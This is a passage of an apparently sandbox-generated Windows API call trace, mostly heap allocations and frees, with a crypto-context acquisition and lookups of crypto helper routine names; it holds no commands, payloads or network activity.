RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0187.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0187.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0187.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0187.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0187.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0187.395] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.395] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.395] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0187.395] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0187.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0187.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0187.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0187.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0187.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0187.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0187.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0187.446] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0187.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0187.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0187.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0187.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0187.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0187.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0187.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0187.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0187.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0187.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0187.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0187.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0187.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0187.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0187.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0187.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0187.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0187.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0187.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0187.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0187.447] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0187.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0187.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0187.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0187.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0187.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0187.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0187.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0187.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69ac8 [0187.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ac8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0187.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0187.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0187.448] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0187.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0187.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0187.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0187.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0187.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0187.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0187.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0187.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0187.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0187.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0187.449] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0187.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0187.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0187.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0187.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0187.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0187.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0187.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0187.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0187.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0187.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0187.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0187.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0187.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0187.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0187.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0187.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0187.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0187.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0187.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0187.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0187.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0187.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0187.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0187.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0187.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0187.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0187.451] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0187.451] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0187.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0187.452] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0187.452] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0187.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0187.452] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0187.452] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.452] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.452] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0187.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0187.452] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.452] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0187.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0187.452] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0187.452] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0187.452] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0187.452] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0187.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0187.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0187.452] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0187.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0187.453] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0187.453] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0187.453] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0187.453] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0187.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0187.453] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0187.454] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, 